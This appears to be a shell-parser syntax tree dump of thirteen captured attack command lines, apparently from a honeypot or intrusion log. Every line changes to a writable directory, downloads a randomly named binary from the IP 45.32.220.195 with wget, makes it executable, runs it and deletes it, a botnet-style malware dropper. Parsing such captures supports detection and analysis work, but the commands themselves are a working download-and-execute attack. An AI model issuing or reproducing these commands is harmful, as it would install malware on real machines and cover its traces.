ListNode(lineno=2, pos=(12, 153), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 102), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 102), word='http://45.32.220.195/gfkdjgdfh'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(102, 103)),
  CommandNode(lineno=2, pos=(104, 122), parts=[
    WordNode(lineno=2, pos=(104, 109), word='chmod'),
    WordNode(lineno=2, pos=(110, 112), word='+x'),
    WordNode(lineno=2, pos=(113, 122), word='gfkdjgdfh'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(122, 123)),
  CommandNode(lineno=2, pos=(124, 135), parts=[
    WordNode(lineno=2, pos=(124, 135), word='./gfkdjgdfh'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(135, 136)),
  CommandNode(lineno=2, pos=(137, 153), parts=[
    WordNode(lineno=2, pos=(137, 139), word='rm'),
    WordNode(lineno=2, pos=(140, 143), word='-rf'),
    WordNode(lineno=2, pos=(144, 153), word='gfkdjgdfh'),
  ]),
])
ListNode(lineno=3, pos=(154, 291), parts=[
  CommandNode(lineno=3, pos=(154, 161), parts=[
    WordNode(lineno=3, pos=(154, 156), word='cd'),
    WordNode(lineno=3, pos=(157, 161), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(162, 164)),
  CommandNode(lineno=3, pos=(165, 176), parts=[
    WordNode(lineno=3, pos=(165, 167), word='cd'),
    WordNode(lineno=3, pos=(168, 176), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(177, 179)),
  CommandNode(lineno=3, pos=(180, 187), parts=[
    WordNode(lineno=3, pos=(180, 182), word='cd'),
    WordNode(lineno=3, pos=(183, 187), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(188, 190)),
  CommandNode(lineno=3, pos=(191, 199), parts=[
    WordNode(lineno=3, pos=(191, 193), word='cd'),
    WordNode(lineno=3, pos=(194, 199), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(200, 202)),
  CommandNode(lineno=3, pos=(203, 207), parts=[
    WordNode(lineno=3, pos=(203, 205), word='cd'),
    WordNode(lineno=3, pos=(206, 207), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(207, 208)),
  CommandNode(lineno=3, pos=(209, 243), parts=[
    WordNode(lineno=3, pos=(209, 213), word='wget'),
    WordNode(lineno=3, pos=(214, 243), word='http://45.32.220.195/fskdjfsd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(243, 244)),
  CommandNode(lineno=3, pos=(245, 262), parts=[
    WordNode(lineno=3, pos=(245, 250), word='chmod'),
    WordNode(lineno=3, pos=(251, 253), word='+x'),
    WordNode(lineno=3, pos=(254, 262), word='fskdjfsd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(262, 263)),
  CommandNode(lineno=3, pos=(264, 274), parts=[
    WordNode(lineno=3, pos=(264, 274), word='./fskdjfsd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(274, 275)),
  CommandNode(lineno=3, pos=(276, 291), parts=[
    WordNode(lineno=3, pos=(276, 278), word='rm'),
    WordNode(lineno=3, pos=(279, 282), word='-rf'),
    WordNode(lineno=3, pos=(283, 291), word='fskdjfsd'),
  ]),
])
ListNode(lineno=4, pos=(292, 437), parts=[
  CommandNode(lineno=4, pos=(292, 299), parts=[
    WordNode(lineno=4, pos=(292, 294), word='cd'),
    WordNode(lineno=4, pos=(295, 299), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(300, 302)),
  CommandNode(lineno=4, pos=(303, 314), parts=[
    WordNode(lineno=4, pos=(303, 305), word='cd'),
    WordNode(lineno=4, pos=(306, 314), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(315, 317)),
  CommandNode(lineno=4, pos=(318, 325), parts=[
    WordNode(lineno=4, pos=(318, 320), word='cd'),
    WordNode(lineno=4, pos=(321, 325), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(326, 328)),
  CommandNode(lineno=4, pos=(329, 337), parts=[
    WordNode(lineno=4, pos=(329, 331), word='cd'),
    WordNode(lineno=4, pos=(332, 337), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(338, 340)),
  CommandNode(lineno=4, pos=(341, 345), parts=[
    WordNode(lineno=4, pos=(341, 343), word='cd'),
    WordNode(lineno=4, pos=(344, 345), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(345, 346)),
  CommandNode(lineno=4, pos=(347, 383), parts=[
    WordNode(lineno=4, pos=(347, 351), word='wget'),
    WordNode(lineno=4, pos=(352, 383), word='http://45.32.220.195/fdkjfsdgfd'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(383, 384)),
  CommandNode(lineno=4, pos=(385, 404), parts=[
    WordNode(lineno=4, pos=(385, 390), word='chmod'),
    WordNode(lineno=4, pos=(391, 393), word='+x'),
    WordNode(lineno=4, pos=(394, 404), word='fdkjfsdgfd'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(404, 405)),
  CommandNode(lineno=4, pos=(406, 418), parts=[
    WordNode(lineno=4, pos=(406, 418), word='./fdkjfsdgfd'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(418, 419)),
  CommandNode(lineno=4, pos=(420, 437), parts=[
    WordNode(lineno=4, pos=(420, 422), word='rm'),
    WordNode(lineno=4, pos=(423, 426), word='-rf'),
    WordNode(lineno=4, pos=(427, 437), word='fdkjfsdgfd'),
  ]),
])
ListNode(lineno=5, pos=(438, 579), parts=[
  CommandNode(lineno=5, pos=(438, 445), parts=[
    WordNode(lineno=5, pos=(438, 440), word='cd'),
    WordNode(lineno=5, pos=(441, 445), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(446, 448)),
  CommandNode(lineno=5, pos=(449, 460), parts=[
    WordNode(lineno=5, pos=(449, 451), word='cd'),
    WordNode(lineno=5, pos=(452, 460), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(461, 463)),
  CommandNode(lineno=5, pos=(464, 471), parts=[
    WordNode(lineno=5, pos=(464, 466), word='cd'),
    WordNode(lineno=5, pos=(467, 471), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(472, 474)),
  CommandNode(lineno=5, pos=(475, 483), parts=[
    WordNode(lineno=5, pos=(475, 477), word='cd'),
    WordNode(lineno=5, pos=(478, 483), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(484, 486)),
  CommandNode(lineno=5, pos=(487, 491), parts=[
    WordNode(lineno=5, pos=(487, 489), word='cd'),
    WordNode(lineno=5, pos=(490, 491), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(491, 492)),
  CommandNode(lineno=5, pos=(493, 528), parts=[
    WordNode(lineno=5, pos=(493, 497), word='wget'),
    WordNode(lineno=5, pos=(498, 528), word='http://45.32.220.195/wejfdsfsd'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(528, 529)),
  CommandNode(lineno=5, pos=(530, 548), parts=[
    WordNode(lineno=5, pos=(530, 535), word='chmod'),
    WordNode(lineno=5, pos=(536, 538), word='+x'),
    WordNode(lineno=5, pos=(539, 548), word='wejfdsfsd'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(548, 549)),
  CommandNode(lineno=5, pos=(550, 561), parts=[
    WordNode(lineno=5, pos=(550, 561), word='./wejfdsfsd'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(561, 562)),
  CommandNode(lineno=5, pos=(563, 579), parts=[
    WordNode(lineno=5, pos=(563, 565), word='rm'),
    WordNode(lineno=5, pos=(566, 569), word='-rf'),
    WordNode(lineno=5, pos=(570, 579), word='wejfdsfsd'),
  ]),
])
ListNode(lineno=6, pos=(580, 709), parts=[
  CommandNode(lineno=6, pos=(580, 587), parts=[
    WordNode(lineno=6, pos=(580, 582), word='cd'),
    WordNode(lineno=6, pos=(583, 587), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(588, 590)),
  CommandNode(lineno=6, pos=(591, 602), parts=[
    WordNode(lineno=6, pos=(591, 593), word='cd'),
    WordNode(lineno=6, pos=(594, 602), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(603, 605)),
  CommandNode(lineno=6, pos=(606, 613), parts=[
    WordNode(lineno=6, pos=(606, 608), word='cd'),
    WordNode(lineno=6, pos=(609, 613), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(614, 616)),
  CommandNode(lineno=6, pos=(617, 625), parts=[
    WordNode(lineno=6, pos=(617, 619), word='cd'),
    WordNode(lineno=6, pos=(620, 625), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(626, 628)),
  CommandNode(lineno=6, pos=(629, 633), parts=[
    WordNode(lineno=6, pos=(629, 631), word='cd'),
    WordNode(lineno=6, pos=(632, 633), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(633, 634)),
  CommandNode(lineno=6, pos=(635, 667), parts=[
    WordNode(lineno=6, pos=(635, 639), word='wget'),
    WordNode(lineno=6, pos=(640, 667), word='http://45.32.220.195/jifsdj'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(667, 668)),
  CommandNode(lineno=6, pos=(669, 684), parts=[
    WordNode(lineno=6, pos=(669, 674), word='chmod'),
    WordNode(lineno=6, pos=(675, 677), word='+x'),
    WordNode(lineno=6, pos=(678, 684), word='jifsdj'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(684, 685)),
  CommandNode(lineno=6, pos=(686, 694), parts=[
    WordNode(lineno=6, pos=(686, 694), word='./jifsdj'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(694, 695)),
  CommandNode(lineno=6, pos=(696, 709), parts=[
    WordNode(lineno=6, pos=(696, 698), word='rm'),
    WordNode(lineno=6, pos=(699, 702), word='-rf'),
    WordNode(lineno=6, pos=(703, 709), word='jifsdj'),
  ]),
])
ListNode(lineno=7, pos=(710, 843), parts=[
  CommandNode(lineno=7, pos=(710, 717), parts=[
    WordNode(lineno=7, pos=(710, 712), word='cd'),
    WordNode(lineno=7, pos=(713, 717), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(718, 720)),
  CommandNode(lineno=7, pos=(721, 732), parts=[
    WordNode(lineno=7, pos=(721, 723), word='cd'),
    WordNode(lineno=7, pos=(724, 732), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(733, 735)),
  CommandNode(lineno=7, pos=(736, 743), parts=[
    WordNode(lineno=7, pos=(736, 738), word='cd'),
    WordNode(lineno=7, pos=(739, 743), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(744, 746)),
  CommandNode(lineno=7, pos=(747, 755), parts=[
    WordNode(lineno=7, pos=(747, 749), word='cd'),
    WordNode(lineno=7, pos=(750, 755), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(756, 758)),
  CommandNode(lineno=7, pos=(759, 763), parts=[
    WordNode(lineno=7, pos=(759, 761), word='cd'),
    WordNode(lineno=7, pos=(762, 763), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(763, 764)),
  CommandNode(lineno=7, pos=(765, 798), parts=[
    WordNode(lineno=7, pos=(765, 769), word='wget'),
    WordNode(lineno=7, pos=(770, 798), word='http://45.32.220.195/ifewhjs'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(798, 799)),
  CommandNode(lineno=7, pos=(800, 816), parts=[
    WordNode(lineno=7, pos=(800, 805), word='chmod'),
    WordNode(lineno=7, pos=(806, 808), word='+x'),
    WordNode(lineno=7, pos=(809, 816), word='ifewhjs'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(816, 817)),
  CommandNode(lineno=7, pos=(818, 827), parts=[
    WordNode(lineno=7, pos=(818, 827), word='./ifewhjs'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(827, 828)),
  CommandNode(lineno=7, pos=(829, 843), parts=[
    WordNode(lineno=7, pos=(829, 831), word='rm'),
    WordNode(lineno=7, pos=(832, 835), word='-rf'),
    WordNode(lineno=7, pos=(836, 843), word='ifewhjs'),
  ]),
])
ListNode(lineno=8, pos=(844, 977), parts=[
  CommandNode(lineno=8, pos=(844, 851), parts=[
    WordNode(lineno=8, pos=(844, 846), word='cd'),
    WordNode(lineno=8, pos=(847, 851), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(852, 854)),
  CommandNode(lineno=8, pos=(855, 866), parts=[
    WordNode(lineno=8, pos=(855, 857), word='cd'),
    WordNode(lineno=8, pos=(858, 866), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(867, 869)),
  CommandNode(lineno=8, pos=(870, 877), parts=[
    WordNode(lineno=8, pos=(870, 872), word='cd'),
    WordNode(lineno=8, pos=(873, 877), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(878, 880)),
  CommandNode(lineno=8, pos=(881, 889), parts=[
    WordNode(lineno=8, pos=(881, 883), word='cd'),
    WordNode(lineno=8, pos=(884, 889), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(890, 892)),
  CommandNode(lineno=8, pos=(893, 897), parts=[
    WordNode(lineno=8, pos=(893, 895), word='cd'),
    WordNode(lineno=8, pos=(896, 897), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(897, 898)),
  CommandNode(lineno=8, pos=(899, 932), parts=[
    WordNode(lineno=8, pos=(899, 903), word='wget'),
    WordNode(lineno=8, pos=(904, 932), word='http://45.32.220.195/sjdfahf'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(932, 933)),
  CommandNode(lineno=8, pos=(934, 950), parts=[
    WordNode(lineno=8, pos=(934, 939), word='chmod'),
    WordNode(lineno=8, pos=(940, 942), word='+x'),
    WordNode(lineno=8, pos=(943, 950), word='sjdfahf'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(950, 951)),
  CommandNode(lineno=8, pos=(952, 961), parts=[
    WordNode(lineno=8, pos=(952, 961), word='./sjdfahf'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(961, 962)),
  CommandNode(lineno=8, pos=(963, 977), parts=[
    WordNode(lineno=8, pos=(963, 965), word='rm'),
    WordNode(lineno=8, pos=(966, 969), word='-rf'),
    WordNode(lineno=8, pos=(970, 977), word='sjdfahf'),
  ]),
])
ListNode(lineno=9, pos=(978, 1115), parts=[
  CommandNode(lineno=9, pos=(978, 985), parts=[
    WordNode(lineno=9, pos=(978, 980), word='cd'),
    WordNode(lineno=9, pos=(981, 985), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(986, 988)),
  CommandNode(lineno=9, pos=(989, 1000), parts=[
    WordNode(lineno=9, pos=(989, 991), word='cd'),
    WordNode(lineno=9, pos=(992, 1000), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1001, 1003)),
  CommandNode(lineno=9, pos=(1004, 1011), parts=[
    WordNode(lineno=9, pos=(1004, 1006), word='cd'),
    WordNode(lineno=9, pos=(1007, 1011), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1012, 1014)),
  CommandNode(lineno=9, pos=(1015, 1023), parts=[
    WordNode(lineno=9, pos=(1015, 1017), word='cd'),
    WordNode(lineno=9, pos=(1018, 1023), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1024, 1026)),
  CommandNode(lineno=9, pos=(1027, 1031), parts=[
    WordNode(lineno=9, pos=(1027, 1029), word='cd'),
    WordNode(lineno=9, pos=(1030, 1031), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1031, 1032)),
  CommandNode(lineno=9, pos=(1033, 1067), parts=[
    WordNode(lineno=9, pos=(1033, 1037), word='wget'),
    WordNode(lineno=9, pos=(1038, 1067), word='http://45.32.220.195/fjhdsngh'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1067, 1068)),
  CommandNode(lineno=9, pos=(1069, 1086), parts=[
    WordNode(lineno=9, pos=(1069, 1074), word='chmod'),
    WordNode(lineno=9, pos=(1075, 1077), word='+x'),
    WordNode(lineno=9, pos=(1078, 1086), word='fjhdsngh'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1086, 1087)),
  CommandNode(lineno=9, pos=(1088, 1098), parts=[
    WordNode(lineno=9, pos=(1088, 1098), word='./fjhdsngh'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1098, 1099)),
  CommandNode(lineno=9, pos=(1100, 1115), parts=[
    WordNode(lineno=9, pos=(1100, 1102), word='rm'),
    WordNode(lineno=9, pos=(1103, 1106), word='-rf'),
    WordNode(lineno=9, pos=(1107, 1115), word='fjhdsngh'),
  ]),
])
ListNode(lineno=10, pos=(1116, 1241), parts=[
  CommandNode(lineno=10, pos=(1116, 1123), parts=[
    WordNode(lineno=10, pos=(1116, 1118), word='cd'),
    WordNode(lineno=10, pos=(1119, 1123), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1124, 1126)),
  CommandNode(lineno=10, pos=(1127, 1138), parts=[
    WordNode(lineno=10, pos=(1127, 1129), word='cd'),
    WordNode(lineno=10, pos=(1130, 1138), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1139, 1141)),
  CommandNode(lineno=10, pos=(1142, 1149), parts=[
    WordNode(lineno=10, pos=(1142, 1144), word='cd'),
    WordNode(lineno=10, pos=(1145, 1149), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1150, 1152)),
  CommandNode(lineno=10, pos=(1153, 1161), parts=[
    WordNode(lineno=10, pos=(1153, 1155), word='cd'),
    WordNode(lineno=10, pos=(1156, 1161), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1162, 1164)),
  CommandNode(lineno=10, pos=(1165, 1169), parts=[
    WordNode(lineno=10, pos=(1165, 1167), word='cd'),
    WordNode(lineno=10, pos=(1168, 1169), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1169, 1170)),
  CommandNode(lineno=10, pos=(1171, 1202), parts=[
    WordNode(lineno=10, pos=(1171, 1175), word='wget'),
    WordNode(lineno=10, pos=(1176, 1202), word='http://45.32.220.195/qugfd'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1202, 1203)),
  CommandNode(lineno=10, pos=(1204, 1218), parts=[
    WordNode(lineno=10, pos=(1204, 1209), word='chmod'),
    WordNode(lineno=10, pos=(1210, 1212), word='+x'),
    WordNode(lineno=10, pos=(1213, 1218), word='qugfd'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1218, 1219)),
  CommandNode(lineno=10, pos=(1220, 1227), parts=[
    WordNode(lineno=10, pos=(1220, 1227), word='./qugfd'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1227, 1228)),
  CommandNode(lineno=10, pos=(1229, 1241), parts=[
    WordNode(lineno=10, pos=(1229, 1231), word='rm'),
    WordNode(lineno=10, pos=(1232, 1235), word='-rf'),
    WordNode(lineno=10, pos=(1236, 1241), word='qugfd'),
  ]),
])
ListNode(lineno=11, pos=(1242, 1371), parts=[
  CommandNode(lineno=11, pos=(1242, 1249), parts=[
    WordNode(lineno=11, pos=(1242, 1244), word='cd'),
    WordNode(lineno=11, pos=(1245, 1249), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1250, 1252)),
  CommandNode(lineno=11, pos=(1253, 1264), parts=[
    WordNode(lineno=11, pos=(1253, 1255), word='cd'),
    WordNode(lineno=11, pos=(1256, 1264), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1265, 1267)),
  CommandNode(lineno=11, pos=(1268, 1275), parts=[
    WordNode(lineno=11, pos=(1268, 1270), word='cd'),
    WordNode(lineno=11, pos=(1271, 1275), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1276, 1278)),
  CommandNode(lineno=11, pos=(1279, 1287), parts=[
    WordNode(lineno=11, pos=(1279, 1281), word='cd'),
    WordNode(lineno=11, pos=(1282, 1287), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1288, 1290)),
  CommandNode(lineno=11, pos=(1291, 1295), parts=[
    WordNode(lineno=11, pos=(1291, 1293), word='cd'),
    WordNode(lineno=11, pos=(1294, 1295), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1295, 1296)),
  CommandNode(lineno=11, pos=(1297, 1329), parts=[
    WordNode(lineno=11, pos=(1297, 1301), word='wget'),
    WordNode(lineno=11, pos=(1302, 1329), word='http://45.32.220.195/trhuhe'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1329, 1330)),
  CommandNode(lineno=11, pos=(1331, 1346), parts=[
    WordNode(lineno=11, pos=(1331, 1336), word='chmod'),
    WordNode(lineno=11, pos=(1337, 1339), word='+x'),
    WordNode(lineno=11, pos=(1340, 1346), word='trhuhe'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1346, 1347)),
  CommandNode(lineno=11, pos=(1348, 1356), parts=[
    WordNode(lineno=11, pos=(1348, 1356), word='./trhuhe'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1356, 1357)),
  CommandNode(lineno=11, pos=(1358, 1371), parts=[
    WordNode(lineno=11, pos=(1358, 1360), word='rm'),
    WordNode(lineno=11, pos=(1361, 1364), word='-rf'),
    WordNode(lineno=11, pos=(1365, 1371), word='trhuhe'),
  ]),
])
ListNode(lineno=12, pos=(1372, 1509), parts=[
  CommandNode(lineno=12, pos=(1372, 1379), parts=[
    WordNode(lineno=12, pos=(1372, 1374), word='cd'),
    WordNode(lineno=12, pos=(1375, 1379), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1380, 1382)),
  CommandNode(lineno=12, pos=(1383, 1394), parts=[
    WordNode(lineno=12, pos=(1383, 1385), word='cd'),
    WordNode(lineno=12, pos=(1386, 1394), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1395, 1397)),
  CommandNode(lineno=12, pos=(1398, 1405), parts=[
    WordNode(lineno=12, pos=(1398, 1400), word='cd'),
    WordNode(lineno=12, pos=(1401, 1405), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1406, 1408)),
  CommandNode(lineno=12, pos=(1409, 1417), parts=[
    WordNode(lineno=12, pos=(1409, 1411), word='cd'),
    WordNode(lineno=12, pos=(1412, 1417), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1418, 1420)),
  CommandNode(lineno=12, pos=(1421, 1425), parts=[
    WordNode(lineno=12, pos=(1421, 1423), word='cd'),
    WordNode(lineno=12, pos=(1424, 1425), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1425, 1426)),
  CommandNode(lineno=12, pos=(1427, 1461), parts=[
    WordNode(lineno=12, pos=(1427, 1431), word='wget'),
    WordNode(lineno=12, pos=(1432, 1461), word='http://45.32.220.195/gjdhfhjg'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1461, 1462)),
  CommandNode(lineno=12, pos=(1463, 1480), parts=[
    WordNode(lineno=12, pos=(1463, 1468), word='chmod'),
    WordNode(lineno=12, pos=(1469, 1471), word='+x'),
    WordNode(lineno=12, pos=(1472, 1480), word='gjdhfhjg'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1480, 1481)),
  CommandNode(lineno=12, pos=(1482, 1492), parts=[
    WordNode(lineno=12, pos=(1482, 1492), word='./gjdhfhjg'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1492, 1493)),
  CommandNode(lineno=12, pos=(1494, 1509), parts=[
    WordNode(lineno=12, pos=(1494, 1496), word='rm'),
    WordNode(lineno=12, pos=(1497, 1500), word='-rf'),
    WordNode(lineno=12, pos=(1501, 1509), word='gjdhfhjg'),
  ]),
])
ListNode(lineno=13, pos=(1510, 1655), parts=[
  CommandNode(lineno=13, pos=(1510, 1517), parts=[
    WordNode(lineno=13, pos=(1510, 1512), word='cd'),
    WordNode(lineno=13, pos=(1513, 1517), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1518, 1520)),
  CommandNode(lineno=13, pos=(1521, 1532), parts=[
    WordNode(lineno=13, pos=(1521, 1523), word='cd'),
    WordNode(lineno=13, pos=(1524, 1532), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1533, 1535)),
  CommandNode(lineno=13, pos=(1536, 1543), parts=[
    WordNode(lineno=13, pos=(1536, 1538), word='cd'),
    WordNode(lineno=13, pos=(1539, 1543), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1544, 1546)),
  CommandNode(lineno=13, pos=(1547, 1555), parts=[
    WordNode(lineno=13, pos=(1547, 1549), word='cd'),
    WordNode(lineno=13, pos=(1550, 1555), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1556, 1558)),
  CommandNode(lineno=13, pos=(1559, 1563), parts=[
    WordNode(lineno=13, pos=(1559, 1561), word='cd'),
    WordNode(lineno=13, pos=(1562, 1563), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1563, 1564)),
  CommandNode(lineno=13, pos=(1565, 1601), parts=[
    WordNode(lineno=13, pos=(1565, 1569), word='wget'),
    WordNode(lineno=13, pos=(1570, 1601), word='http://45.32.220.195/gkifdjwfji'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1601, 1602)),
  CommandNode(lineno=13, pos=(1603, 1622), parts=[
    WordNode(lineno=13, pos=(1603, 1608), word='chmod'),
    WordNode(lineno=13, pos=(1609, 1611), word='+x'),
    WordNode(lineno=13, pos=(1612, 1622), word='gkifdjwfji'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1622, 1623)),
  CommandNode(lineno=13, pos=(1624, 1636), parts=[
    WordNode(lineno=13, pos=(1624, 1636), word='./gkifdjwfji'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1636, 1637)),
  CommandNode(lineno=13, pos=(1638, 1655), parts=[
    WordNode(lineno=13, pos=(1638, 1640), word='rm'),
    WordNode(lineno=13, pos=(1641, 1644), word='-rf'),
    WordNode(lineno=13, pos=(1645, 1655), word='gkifdjwfji'),
  ]),
])
ListNode(lineno=14, pos=(1656, 1785), parts=[
  CommandNode(lineno=14, pos=(1656, 1663), parts=[
    WordNode(lineno=14, pos=(1656, 1658), word='cd'),
    WordNode(lineno=14, pos=(1659, 1663), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1664, 1666)),
  CommandNode(lineno=14, pos=(1667, 1678), parts=[
    WordNode(lineno=14, pos=(1667, 1669), word='cd'),
    WordNode(lineno=14, pos=(1670, 1678), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1679, 1681)),
  CommandNode(lineno=14, pos=(1682, 1689), parts=[
    WordNode(lineno=14, pos=(1682, 1684), word='cd'),
    WordNode(lineno=14, pos=(1685, 1689), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1690, 1692)),
  CommandNode(lineno=14, pos=(1693, 1701), parts=[
    WordNode(lineno=14, pos=(1693, 1695), word='cd'),
    WordNode(lineno=14, pos=(1696, 1701), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1702, 1704)),
  CommandNode(lineno=14, pos=(1705, 1709), parts=[
    WordNode(lineno=14, pos=(1705, 1707), word='cd'),
    WordNode(lineno=14, pos=(1708, 1709), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1709, 1710)),
  CommandNode(lineno=14, pos=(1711, 1743), parts=[
    WordNode(lineno=14, pos=(1711, 1715), word='wget'),
    WordNode(lineno=14, pos=(1716, 1743), word='http://45.32.220.195/zfrhwe'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1743, 1744)),
  CommandNode(lineno=14, pos=(1745, 1760), parts=[
    WordNode(lineno=14, pos=(1745, 1750), word='chmod'),
    WordNode(lineno=14, pos=(1751, 1753), word='+x'),
    WordNode(lineno=14, pos=(1754, 1760), word='zfrhwe'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1760, 1761)),
  CommandNode(lineno=14, pos=(1762, 1770), parts=[
    WordNode(lineno=14, pos=(1762, 1770), word='./zfrhwe'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1770, 1771)),
  CommandNode(lineno=14, pos=(1772, 1785), parts=[
    WordNode(lineno=14, pos=(1772, 1774), word='rm'),
    WordNode(lineno=14, pos=(1775, 1778), word='-rf'),
    WordNode(lineno=14, pos=(1779, 1785), word='zfrhwe'),
  ]),
])
